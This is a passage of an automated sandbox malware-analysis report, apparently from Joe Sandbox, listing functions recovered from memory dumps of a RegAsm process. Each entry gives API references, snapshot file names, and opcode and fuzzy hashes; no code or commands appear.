                                                      Function 0537A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0537B101,00000800,00000000,00000000), ref: 0537B312
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: e8832b3828d0e55bab522a59533675a110422b205c094b121082874d6efac1a8
                                                      • Instruction ID: 13e0c197ed171d2274ed44580536768867acc920252277c2640fc928adf015a9
                                                      • Opcode Fuzzy Hash: e8832b3828d0e55bab522a59533675a110422b205c094b121082874d6efac1a8
                                                      • Instruction Fuzzy Hash: 601114B6C043498FDB20CF9AC844ADEFBF4EB88310F10842ED919A7200D779A545CFA4
                                                      Function 0537B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0537B086
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1666832747.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_5370000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: a1f8b3d4a3dbfeddd0892867b067b36ba35e54cb88dab062e4d5f260f131f933
                                                      • Instruction ID: 8c9447bf40a75a11893504b68242936bd524f6699850b9a7fd56e0426ffb7dba
                                                      • Opcode Fuzzy Hash: a1f8b3d4a3dbfeddd0892867b067b36ba35e54cb88dab062e4d5f260f131f933
                                                      • Instruction Fuzzy Hash: CF11D2B5C007498FDB20DF9AD844BDEFBF4AB88224F14841AD829B7210D379A545CFA1
                                                      Function 068F59D8 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: d
                                                      • API String ID: 0-2564639436
                                                      • Opcode ID: ff7eb24ff7942b8a16f7ffd8b91554e8d2bdfff998d2b2edacf4c378bd606bb8
                                                      • Instruction ID: 7d35bdd6466f9b3323d5a25dc108a77affe57d21c2362bc7f7d2ed59bca35e8e
                                                      • Opcode Fuzzy Hash: ff7eb24ff7942b8a16f7ffd8b91554e8d2bdfff998d2b2edacf4c378bd606bb8
                                                      • Instruction Fuzzy Hash: 82C15C34610602CFC724CF28C48096ABBF2FF9931472ACA99D65ADB665D734FC46CB91
                                                      Function 068D1BA0 Relevance: 1.4, Instructions: 1438COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f8ad86cf215992c4fc8b60a3bf1d8245036d6db7fb7103148d902ed6a9e36810
                                                      • Instruction ID: 90ea02fd76c6c013fb5ef1282d696926830e733a1213c42e05affe2f65518e55
                                                      • Opcode Fuzzy Hash: f8ad86cf215992c4fc8b60a3bf1d8245036d6db7fb7103148d902ed6a9e36810
                                                      • Instruction Fuzzy Hash: 61C24E30A002199FDB55DF65C891BEDBBB2FF88704F108499E60A9B3A1DB719E41CF91
                                                      Function 068F3DE0 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q
                                                      • API String ID: 0-1807707664
                                                      • Opcode ID: 5423170f14b30f4a0ecf55680301ed464b99adb6f5022ace40808c25fbb7f484
                                                      • Instruction ID: 841bfac21ced64b50a1a2cd1a1bd5fd923e7acbe5d6f1846a253d2c064128945
                                                      • Opcode Fuzzy Hash: 5423170f14b30f4a0ecf55680301ed464b99adb6f5022ace40808c25fbb7f484
                                                      • Instruction Fuzzy Hash: 4B31F231B103514FC729AB78A45456E7BF6EFCA22034544AEE549CF791DE30AC07CBA1
                                                      Function 0701C8C0 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hq
                                                      • API String ID: 0-1594803414
                                                      • Opcode ID: aaa10dade42c68cf0124c8b4f36619feadf3189c72155de62d2b1fd26fc0ac87
                                                      • Instruction ID: c722883d43317e64c282b66fe2db72d228988c6d516b620b74f0bd4ff407ecd1
                                                      • Opcode Fuzzy Hash: aaa10dade42c68cf0124c8b4f36619feadf3189c72155de62d2b1fd26fc0ac87
                                                      • Instruction Fuzzy Hash: 3841BDB0B042199FEB059F35D80867E7BF6FF85700B188569E956C7290EB34D902DBA2
                                                      Function 068F84D8 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q
                                                      • API String ID: 0-1807707664
                                                      • Opcode ID: 9629d3df46771a3878bb940c5678ba42404b99028e3a3d1f77fe43e022676f10
                                                      • Instruction ID: e2bf2954688ae0554b7304da93bd88c42f9f408a23155b338633a0838c3d75ec
                                                      • Opcode Fuzzy Hash: 9629d3df46771a3878bb940c5678ba42404b99028e3a3d1f77fe43e022676f10
                                                      • Instruction Fuzzy Hash: F131BF71B003058FCB48EB7EA45566F7AE3ABC82507504539E60ACB384EE38EC068BD5
                                                      Function 068F84C8 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q
                                                      • API String ID: 0-1807707664
                                                      • Opcode ID: bcee31fda671f8cae7b5ff6af2d9436cc4bf15eaa714228a5235d78007db5040
                                                      • Instruction ID: bb564851f1ffa923d1daa247f41d508a0011106515c53887bf70d1f6ae129ad5
                                                      • Opcode Fuzzy Hash: bcee31fda671f8cae7b5ff6af2d9436cc4bf15eaa714228a5235d78007db5040
                                                      • Instruction Fuzzy Hash: E7219171B003158FCB59AB7DA46566F3AE3ABC8241754453DE506CB388EE38EC0687D5
                                                      Function 0701F401 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q
                                                      • API String ID: 0-1807707664
                                                      • Opcode ID: 43ddd177d4c9d54af6a7b871fd65f07c7a0a2f9587542df206babfc11026a39e
                                                      • Instruction ID: b7491b09ca912645da6baa8a0ac07817b67896d446dfde7be65cbe9a73fd41c7
                                                      • Opcode Fuzzy Hash: 43ddd177d4c9d54af6a7b871fd65f07c7a0a2f9587542df206babfc11026a39e
                                                      • Instruction Fuzzy Hash: 6931D430A043299FD705FFA5E955BDE7BB1FB48301F00866AD0029B299DB742D05CB91
                                                      Function 0701F531 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q
                                                      • API String ID: 0-1301096350
                                                      • Opcode ID: d3e441f371dce86278696748035e06e9206cd62d8caae18093d57775cf8a6d26
                                                      • Instruction ID: f649c9e77c778fbbf8b03cc153b5ee2a1409d6dada18764b7b5c889f213150e0
                                                      • Opcode Fuzzy Hash: d3e441f371dce86278696748035e06e9206cd62d8caae18093d57775cf8a6d26
                                                      • Instruction Fuzzy Hash: 0421EB747062229FC714EF25F9588AA7BF6FF88611B00076AE506CB365CB31AC00CB91
                                                      Function 0701F410 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q
                                                      • API String ID: 0-1807707664
                                                      • Opcode ID: 915e3a2ff99cb9214d172da67ea7b82b536636aef02949cc0ec849ad97829729
                                                      • Instruction ID: 6b4f25ef529fb3cd3b2f64da27bffb683bbafb8c59a1f41f6b50f0a76d1044be
                                                      • Opcode Fuzzy Hash: 915e3a2ff99cb9214d172da67ea7b82b536636aef02949cc0ec849ad97829729
                                                      • Instruction Fuzzy Hash: 3D218270A002299FDB05FFA5E955B9E7BB2FB44301F008669D1069B298DB752D05CF91
                                                      Function 068FB358 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q
                                                      • API String ID: 0-1807707664
                                                      • Opcode ID: 6fe6ab098132c2dc60744111e5107ba48aa7a2ecc7649bcefcd8784b4cf94bcd
                                                      • Instruction ID: 49938ba56ef23e771ed181fb993c8b9fc6fd24c9efcbec4f5798be1c2e52e96f
                                                      • Opcode Fuzzy Hash: 6fe6ab098132c2dc60744111e5107ba48aa7a2ecc7649bcefcd8784b4cf94bcd
                                                      • Instruction Fuzzy Hash: D201D474D0634AEFCB05FFB4E95459C7FB2BF44200B1401A9D8459B315DB301E46CB51
                                                      Function 068F3EC8 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q
                                                      • API String ID: 0-1807707664
                                                      • Opcode ID: 1d3ee3a28324538f3758b06638994ec1c98b7349517df79994adb934b82e60c6
                                                      • Instruction ID: 3605494ad6f6cd4dffd361e56b4c3e4d56d0d44d964f031f0b9e622746b8bf21
                                                      • Opcode Fuzzy Hash: 1d3ee3a28324538f3758b06638994ec1c98b7349517df79994adb934b82e60c6
                                                      • Instruction Fuzzy Hash: 97F090317002054FC368FB6AE451A6E7BE6EBC9221354496DD40A8B758EE30BD0B87E5
                                                      Function 068FB368 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q
                                                      • API String ID: 0-1807707664
                                                      • Opcode ID: 8074774170d9430ac7711e2af6f41c5cb9a3ea26951caa9534dcaf57497bfac1
                                                      • Instruction ID: 275978dba464aa23129a251a1bac07caadd711b51a7e830aed145c551802a7b1
                                                      • Opcode Fuzzy Hash: 8074774170d9430ac7711e2af6f41c5cb9a3ea26951caa9534dcaf57497bfac1
                                                      • Instruction Fuzzy Hash: F8F03C74E0221AEFCB04FFB9E55455CBFB2BF44211B1442A9D80697319EB306E46CB55
                                                      Function 068D3838 Relevance: .8, Instructions: 778COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3eceb3a3569f1ed69345dcd19dfe24cef72f6aab04a05a91d0382a981a2209ce
                                                      • Instruction ID: 443da0bc3dccf836dbb3e5f415295f31bb17a7dd141d25f216b1ead1c80fd6cd
                                                      • Opcode Fuzzy Hash: 3eceb3a3569f1ed69345dcd19dfe24cef72f6aab04a05a91d0382a981a2209ce
                                                      • Instruction Fuzzy Hash: EA623D74B002049FDB54DF68C894E6EBBF6FF89704F108099E606DB3A1DA71EC418B61
                                                      Function 068D00D8 Relevance: .7, Instructions: 676COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c063546a369c6cedfc718fbf2da92d88c6abf84009c09f77128485b541596de9
                                                      • Instruction ID: 2ede48e3cfcadafa99fc145bb7059ff2457d916952c4bc758629c2e639e1cd5b
                                                      • Opcode Fuzzy Hash: c063546a369c6cedfc718fbf2da92d88c6abf84009c09f77128485b541596de9
                                                      • Instruction Fuzzy Hash: FD42BC30B007248FDB64AF65E45062EBBF2FBC5214B504A5CD6039F3A4CB79ED058B96
                                                      Function 068F48B8 Relevance: .6, Instructions: 593COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e761fb05644e2bf180c806034061055bc8b087b95fb640a20d7d2c65f510475
                                                      • Instruction ID: 90504fd607a0dfec744c5b296bc2445daa2dded28bd5796cc3da8b624d2a7189
                                                      • Opcode Fuzzy Hash: 9e761fb05644e2bf180c806034061055bc8b087b95fb640a20d7d2c65f510475
                                                      • Instruction Fuzzy Hash: DD326A34B106058FDB54DF69C488A6EBBF2FF88305B1585A9E606DB366DB30EC46CB50
                                                      Function 068D0597 Relevance: .5, Instructions: 462COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4067be79b0471dcb1773ad40243d14d20efd93ab4c8acdf16f3d82d58ea44ea1
                                                      • Instruction ID: 78828ef84477d0958451a802360a7008c605f4781f38a2f7abada330785d58dc
                                                      • Opcode Fuzzy Hash: 4067be79b0471dcb1773ad40243d14d20efd93ab4c8acdf16f3d82d58ea44ea1
                                                      • Instruction Fuzzy Hash: 3802DC30B003148FEB64AF61D455A6DBBB2FF89204F50495DE6438F3A5CB79EC018BA6
                                                      Function 068D060F Relevance: .5, Instructions: 453COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5747c417d77d482ceacf267ab3541b61d534927643d9f0c9722eda5ad558234a
                                                      • Instruction ID: 49e167e94d91de6d27011d65cd08089ed4d6d44ea0c27575b74cafaf32db8410
                                                      • Opcode Fuzzy Hash: 5747c417d77d482ceacf267ab3541b61d534927643d9f0c9722eda5ad558234a
                                                      • Instruction Fuzzy Hash: 4302CC30B403148FEB649F61D855B6DBBB2FF89704F504559EA438B3A1CB79EC018BA6
                                                      Function 0701A1AB Relevance: .4, Instructions: 393COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc049e5e8733c72203702e64ca42835448e2638c629e34d1ba956b304f02a1ec
                                                      • Instruction ID: 4efc60a37828c2146a218542f29a6e4f127e4436cd0daea2b3727c2721f0dc14
                                                      • Opcode Fuzzy Hash: bc049e5e8733c72203702e64ca42835448e2638c629e34d1ba956b304f02a1ec
                                                      • Instruction Fuzzy Hash: 7E1293B4A022298FCB64EF24D898B9DBBB2FF49301F6045D9D409A7354DB31AE85CF54
                                                      Function 068D0687 Relevance: .4, Instructions: 389COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 232cf8171621b61f32bd4972c0c167ce352c0cfc3e5e82b9587620e8432e9fc7
                                                      • Instruction ID: c96abb9e748bc959ce8ff66281021004f064c830fbbfece18b7795affb2891de
                                                      • Opcode Fuzzy Hash: 232cf8171621b61f32bd4972c0c167ce352c0cfc3e5e82b9587620e8432e9fc7
                                                      • Instruction Fuzzy Hash: F6E19A30B403049FEB549F62D859B6DBBB2FB89704F508559EA42CB3A1CB75DC01CBA6
                                                      Function 068D06FF Relevance: .4, Instructions: 354COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 92edf7d0f8c5d9c89e9681595369e9cdc740a017b6803d4c1a3cf2abf46d5a99
                                                      • Instruction ID: aea798db888b21ad12df25c879d9e59de5f09075ed6ba6bb759b5eb278ca7c7f
                                                      • Opcode Fuzzy Hash: 92edf7d0f8c5d9c89e9681595369e9cdc740a017b6803d4c1a3cf2abf46d5a99
                                                      • Instruction Fuzzy Hash: B2D18C30B503049FEB559F65C859B6D7BA2FF89705F14806AEA42CB3A1CB75DC01CBA2
                                                      Function 068D00B7 Relevance: .3, Instructions: 337COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d7f715a06b7b694b597f33d7211db74d520b94450563e8847ef959c9416b5f2
                                                      • Instruction ID: c39c6cddb0ba26325349e72d0efe32e1e846ac7a131ce82066d53e53dd027040
                                                      • Opcode Fuzzy Hash: 5d7f715a06b7b694b597f33d7211db74d520b94450563e8847ef959c9416b5f2
                                                      • Instruction Fuzzy Hash: 7DC17F30B402049FEB459F66C859B6D7BB6FF89705F14806AEA42CB3A1CB75DC01CBA1
                                                      Function 068F48A8 Relevance: .3, Instructions: 279COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64a54c9ff38df75b5e0e8d34ddd7e05b37df4092f1e893f35c2f21f2f7fa7ac8
                                                      • Instruction ID: fa6942b8abce8468243f763c6d6c6973e2949ff1e3bae94f8510d48599b15497
                                                      • Opcode Fuzzy Hash: 64a54c9ff38df75b5e0e8d34ddd7e05b37df4092f1e893f35c2f21f2f7fa7ac8
                                                      • Instruction Fuzzy Hash: 9CB14634B106048FCB54DF79C488A6EBBF6BF88205B1540A9E646DB376DB30EC06CB60
                                                      Function 068F7D58 Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d48ff95d4029ab815665322fd4e4a24291cfc6f10a4a588bce3659a44287197
                                                      • Instruction ID: 86fa99312bed8b4742c736913273adde0600711591a20a3c890d80b3b7fe1524
                                                      • Opcode Fuzzy Hash: 7d48ff95d4029ab815665322fd4e4a24291cfc6f10a4a588bce3659a44287197
                                                      • Instruction Fuzzy Hash: 75513671E10358CFEB64CFA9E885BDEBBB1AF88700F14852AD515EB254DB749842CF90
                                                      Function 068F59C8 Relevance: .1, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b9ade2ddd58586a6a8490499a879a70da933464d19cad38e6c687e5d91abc1c
                                                      • Instruction ID: d33a73bf4ed905e335e67dccb5a66945ad36f403427413ec58838f77cd0b6a3d
                                                      • Opcode Fuzzy Hash: 9b9ade2ddd58586a6a8490499a879a70da933464d19cad38e6c687e5d91abc1c
                                                      • Instruction Fuzzy Hash: 80514835A106059FCB14CF58C4809AEBBF2FF99310B698999E659DB361D730F812CB91
                                                      Function 068D34D8 Relevance: .1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0093a8ce574b3d670aeabd85c1d73bf04f21266f23e5ca390c161acebd694872
                                                      • Instruction ID: a8a95ae9155f5d86e641d0c52cfb8804a6551339a48bebbb9f145e3b372e87fe
                                                      • Opcode Fuzzy Hash: 0093a8ce574b3d670aeabd85c1d73bf04f21266f23e5ca390c161acebd694872
                                                      • Instruction Fuzzy Hash: A9513935B106149FCB54DF69C88499EBBF2EF8D314B1580A9E905EB361DA31EC05CB60
                                                      Function 068D3328 Relevance: .1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668903718.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68d0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4951eff8a0642788244596829d26f7d2acbb933721784b342349df4be902fe7f
                                                      • Instruction ID: d851bbcef74129c6c61998639c1968cede73cbdf3f5645fc8dc5d5d9d0e8f558
                                                      • Opcode Fuzzy Hash: 4951eff8a0642788244596829d26f7d2acbb933721784b342349df4be902fe7f
                                                      • Instruction Fuzzy Hash: 98512935F102189FCB54DF69C8849AEBBF2EF89314B158069E905EB361DB31ED01CB61
                                                      Function 068F7D4C Relevance: .1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 518e3a72460f932fad3499f4c7f5c443b3de5f85b71814974665df8fd5f9b96a
                                                      • Instruction ID: a318731105f5d83361ec031050b0303fda6264efba1dbdee7b5ac6d8a721b7cb
                                                      • Opcode Fuzzy Hash: 518e3a72460f932fad3499f4c7f5c443b3de5f85b71814974665df8fd5f9b96a
                                                      • Instruction Fuzzy Hash: 78514670E103589FEB64CFA9E885BDEBBF1AF48700F14852AD515EB284DB749846CF90
                                                      Function 068F5579 Relevance: .1, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa95fe8f4465c4be5317eb5ca84b1523a382b916d362648daa84a460f47825bb
                                                      • Instruction ID: 4a569b7abafa4dfcfa97aacb834496adf18e7607da43f1bdef5d93eb8379dc44
                                                      • Opcode Fuzzy Hash: fa95fe8f4465c4be5317eb5ca84b1523a382b916d362648daa84a460f47825bb
                                                      • Instruction Fuzzy Hash: 2D31BE39B112109FCB15DF74D88496EBBB2BF89201B118469FA05CB355DB30DD06CB91
                                                      Function 0701B4D5 Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bb50c8a9fe61c2021cc38dada3e8d472e63cd55a1aea13762b47c67d204f208
                                                      • Instruction ID: 7639a59bdbc9ad14961a66e983333858de27dee31654ef535ec50df4e088d80d
                                                      • Opcode Fuzzy Hash: 6bb50c8a9fe61c2021cc38dada3e8d472e63cd55a1aea13762b47c67d204f208
                                                      • Instruction Fuzzy Hash: F641CFB4D05228CFCB61DFA8C8547EDBBB6FF4A301F1052AAD41AA7251DB349A85CF11
                                                      Function 068F5588 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
